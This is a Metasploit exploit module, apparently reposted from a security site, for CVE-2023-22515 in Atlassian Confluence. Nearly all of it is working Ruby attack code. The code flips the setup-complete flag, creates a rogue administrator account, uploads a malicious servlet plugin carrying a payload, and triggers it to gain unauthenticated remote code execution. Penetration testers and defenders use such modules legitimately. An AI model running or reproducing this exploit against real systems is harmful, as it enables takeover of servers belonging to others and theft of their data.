Authored by sfewer-r7 | Site metasploit.com

This Metasploit module exploits an improper input validation issue in Atlassian Confluence, allowing arbitrary HTTP parameters to be translated into getter/setter sequences via the XWorks2 middleware and in turn allows for Java objects to be modified at run time. The exploit will create a new administrator user and upload a malicious plugins to get arbitrary code execution. All versions of Confluence between 8.0.0 through to 8.3.2, 8.4.0 through to 8.4.2, and 8.5.0 through to 8.5.1 are affected.

advisories | CVE-2023-22515

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Retry
include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Atlassian Confluence Unauthenticated Remote Code Execution',
'Description' => %q{
This module exploits an improper input validation issue in Atlassian Confluence, allowing arbitrary HTTP
parameters to be translated into getter/setter sequences via the XWorks2 middleware and in turn allows for
Java objects to be modified at run time. The exploit will create a new administrator user and upload a
malicious plugins to get arbitrary code execution. All versions of Confluence between 8.0.0 through to 8.3.2,
8.4.0 through to 8.4.2, and 8.5.0 through to 8.5.1 are affected.
},
'License' => MSF_LICENSE,
'Author' => [
'sfewer-r7', # MSF Exploit & Rapid7 Analysis
],
'References' => [
['CVE', '2023-22515'],
['URL', 'https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis'],
['URL', 'https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html'],
],
'DisclosureDate' => '2023-10-04',
'Privileged' => false, # `NT AUTHORITYNETWORK SERVICE` on Windows by default.
'Targets' => [
[
'Automatic',
{
'Platform' => 'java',
'Arch' => [ARCH_JAVA]
}
],
],
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
# Note we cannot delete the admin user we create, as Confluence prevents a user deleting themself.
'SideEffects' => [IOC_IN_LOGS]
}
)
)

register_options(
[
# By default Confluence listens for HTTP requests on TCP port 8090.
Opt::RPORT(8090),
# Confluence may have a non default base path, allow user to configure that here.
OptString.new('TARGETURI', [true, 'Base path for Confluence', '/']),
# The endpoint we target to trigger the vulnerability.
OptString.new('CONFLUENCE_TARGET_ENDPOINT', [true, 'The endpoint used to trigger the vulnerability.', 'server-info.action']),
# We upload a new plugin, we need to wait for the plugin to be installed. This options governs how long we wait.
OptInt.new('CONFLUENCE_PLUGIN_TIMEOUT', [true, 'The timeout (in seconds) to wait when installing a plugin', 30])
]
)
end

def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, datastore['CONFLUENCE_TARGET_ENDPOINT'])
)

return CheckCode::Unknown('Connection failed') unless res

# Ensure target is a Confluence server by identifying an expected HTTP header.
return CheckCode::Unknown('No 'X-Confluence-Request-Time' header') unless res.headers.key? 'X-Confluence-Request-Time'

if res.code == 200 && res.body
# Pull out the version string from one of three known locations within the HTML.
m = res.body.match(/ajs-version-number" content="(d+.d+.d+)"/i)
if m.nil?
m = res.body.match(/Printed by Atlassian Confluence (d+.d+.d+)/i)
if m.nil?
m = res.body.match(%r{<span id='footer-build-information'>(d+.d+.d+)</span>}i)
end
end

unless m.nil?
version = Rex::Version.new(m[1])

ranges = [
['8.0.0', '8.3.2'],
['8.4.0', '8.4.2'],
['8.5.0', '8.5.1']
]

# If we have a Confluence server within the given version ranges, it appears vulnerable.
ranges.each do |min, max|
if version.between?(Rex::Version.new(min), Rex::Version.new(max))
return Exploit::CheckCode::Appears("Atlassian Confluence #{version}")
end
end

# By here we know we have a confluence server, but the version found indicates it is safe.
return Exploit::CheckCode::Safe("Atlassian Confluence #{version}")
end
end

# By here we have identified a Confluence server, but could not get the version number to determine if it is
# vulnerable of not.
CheckCode::Detected
end

def exploit
target_endpoint = normalize_uri(target_uri.path, datastore['CONFLUENCE_TARGET_ENDPOINT'])

print_status("Setting the application configuration's setupComplete to false via endpoint: #{target_endpoint}")

# 1. Leverage CVE-2023-22515 to modify a configuration setting, allowing us to reach the /setup/* endpoints.
res = send_request_cgi(
'method' => 'POST',
'uri' => target_endpoint,
'vars_post' => {
'bootstrapStatusProvider.applicationConfig.setupComplete' => 'false'
}
)

unless res&.code == 302 || res&.code == 200
fail_with(Failure::UnexpectedReply, "Unexpected reply from endpoint: #{target_endpoint}")
end

print_status('Creating a new administrator user account...')

# usernames must be lowercase
admin_username = rand_text_alpha_lower(8)
admin_password = rand_text_alphanumeric(8)

# 2. Create a new administrator user account.
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'setup', 'setupadministrator.action'),
'headers' => {
'X-Atlassian-Token' => 'no-check'
},
'vars_post' => {
'username' => admin_username,
'fullName' => rand_text_alphanumeric(8),
# The email address does not need to be a valid address, but it must contain an @ character.
'email' => "#{rand_text_alphanumeric(8)}@#{rand_text_alphanumeric(8)}",
'password' => admin_password,
'confirm' => admin_password,
'setup-next-button' => 'Next'
}
)

unless res&.code == 302 || res&.code == 200
fail_with(Failure::UnexpectedReply, 'Unexpected reply from endpoint: /setup/setupadministrator.action')
end

print_status("Created #{admin_username}:#{admin_password}")

# 3. Force the setup to become completed, to allow normal Confluence operations to continue.
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'setup', 'finishsetup.action'),
'headers' => {
'X-Atlassian-Token' => 'no-check'
}
)

unless res&.code == 200
fail_with(Failure::UnexpectedReply, 'Unexpected reply from endpoint: /setup/finishsetup.action')
end

print_status('Adding a malicious plugin...')

# 4. Upload a new Confluence Servlet plugin, by first requesting a UPM token.
res = send_request_cgi(
'method' => 'GET',
# Note, we concatenate '/' as this is required by the endpoint.
'uri' => normalize_uri(target_uri.path, 'rest', 'plugins', '1.0') + '/',
'headers' => {
'Authorization' => basic_auth(admin_username, admin_password),
'Accept' => '*/*'
},
'vars_get' => {
'os_authType' => 'basic'
}
)

unless res&.code == 200
fail_with(Failure::UnexpectedReply, 'Unexpected reply from endpoint: /rest/plugins/1.0/')
end

upm_token = res.headers['upm-token']
unless upm_token
fail_with(Failure::UnexpectedReply, 'No UPM token from endpoint: /rest/plugins/1.0/')
end

begin
payload_endpoint = rand_text_alphanumeric(8)

plugin_key = rand_text_alpha(8)

# 5. Construct a malicious Servlet plugin JAR file. We set :random to true which will randomize the string
# 'metasploit' in the class paths (via Rex::Zip::Jar::add_sub).
jar = payload.encoded_jar(random: true)

jar.add_file(
'atlassian-plugin.xml',
%(
<atlassian-plugin name="#{rand_text_alpha(8)}" key="#{plugin_key}" plugins-version="2">
<plugin-info>
<description>#{rand_text_alphanumeric(8)}</description>
<version>#{rand(1024)}.#{rand(1024)}</version>
</plugin-info>
<servlet key="#{rand_text_alpha(8)}" class="#{jar.substitutions['metasploit']}.PayloadServlet">
<url-pattern>#{normalize_uri(payload_endpoint)}</url-pattern>
</servlet>
</atlassian-plugin>)
)

jar.add_file('metasploit/PayloadServlet.class', MetasploitPayloads.read('java', 'metasploit', 'PayloadServlet.class'))

message = Rex::MIME::Message.new

message.add_part(jar.pack, 'application/octet-stream', 'binary', "form-data; name="plugin"; filename="#{rand_text_alphanumeric(8)}.jar"")

# 6. Upload the malicious plugin.
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'rest', 'plugins', '1.0') + '/',
'ctype' => 'multipart/form-data; boundary=' + message.bound,
'headers' => {
'Authorization' => basic_auth(admin_username, admin_password),
'Accept' => '*/*'
},
'vars_get' => {
'token' => upm_token
},
'data' => message.to_s
)

unless res&.code == 202
fail_with(Failure::UnexpectedReply, 'Uploading plugin failed, unexpected reply code from endpoint: /rest/plugins/1.0/')
end

unless res.body =~ %r{<textarea>(.+)</textarea>}
fail_with(Failure::UnexpectedReply, 'Uploading plugin failed, unexpected reply data from endpoint: /rest/plugins/1.0/')
end

begin
plugin_json = JSON.parse(::Regexp.last_match(1))
rescue JSON::ParserError
fail_with(Failure::UnexpectedReply, 'Uploading plugin failed, failed to parse JSON data from endpoint: /rest/plugins/1.0/')
end

# We receive a JSON object like this:
# <textarea>{"type":"INSTALL","pingAfter":100,"status":{"done":false,"statusCode":200,"contentType":"application/vnd.atl.plugins.install.installing+json","source":"JQEjEJBr.jar","name":"JQEjEJBr.jar"},"links":{"self":"/rest/plugins/1.0/pending/52227753-1c3e-496f-a4f4-d52a8b3850dc","alternate":"/rest/plugins/1.0/tasks/52227753-1c3e-496f-a4f4-d52a8b3850dc"},"timestamp":1697471602188,"userKey":"4028d6b28b294680018b39311d17001e","id":"52227753-1c3e-496f-a4f4-d52a8b3850dc"}</textarea>

links_alternate = plugin_json&.dig('links', 'alternate')
if links_alternate.nil?
fail_with(Failure::UnexpectedReply, 'Uploading plugin failed, no alternate link in reply from endpoint: /rest/plugins/1.0/')
end

print_status('Waiting for plugin to be installed...')

# 7. The plugin is installed asynchronously, so we poll the server for installation to be completed.
plugin_ready = retry_until_truthy(timeout: datastore['CONFLUENCE_PLUGIN_TIMEOUT']) do
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, links_alternate)
)

# We receive a JSON result to indicate if the plugin is finished installing.
# {"links":{"self":"/rest/plugins/1.0/tasks/52227753-1c3e-496f-a4f4-d52a8b3850dc","result":"/rest/plugins/1.0/plkWITNH-key"},"done":true,"type":"INSTALL","progress":1.0,"pollDelay":100,"timestamp":1697471602188}

if res&.code == 200
begin
res_json = JSON.parse(res.body)
next res_json['done']
rescue JSON::ParserError
next false
end
end

false
end

unless plugin_ready
fail_with(Failure::TimeoutExpired, 'Uploading plugin failed, timeout while waiting to install.')
end

print_status('Triggering payload...')

# 8. Trigger the payload by performing a request to the malicious servlet endpoint.
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'plugins', 'servlet', payload_endpoint)
)

unless res&.code == 200
fail_with(Failure::PayloadFailed, "Triggering payload failed, unexpected reply from endpoint: /plugins/servlet/#{payload_endpoint}")
end
ensure
print_status('Deleting plugin...')

# 9. Delete the plugin we uploaded as we no longer need it. We cannot delete the admin user we created as
# Confluence doesnt allow a user to delete themself.
res = send_request_cgi(
'method' => 'DELETE',
'uri' => normalize_uri(target_uri.path, 'rest', 'plugins', '1.0', "#{plugin_key}-key"),
'headers' => {
'Authorization' => basic_auth(admin_username, admin_password),
'Connection' => 'close'
}
)

unless res&.code == 204
print_warning("Deleting plugin failed, unexpected reply from endpoint: /plugins/servlet/#{payload_endpoint}")
end
end
end

end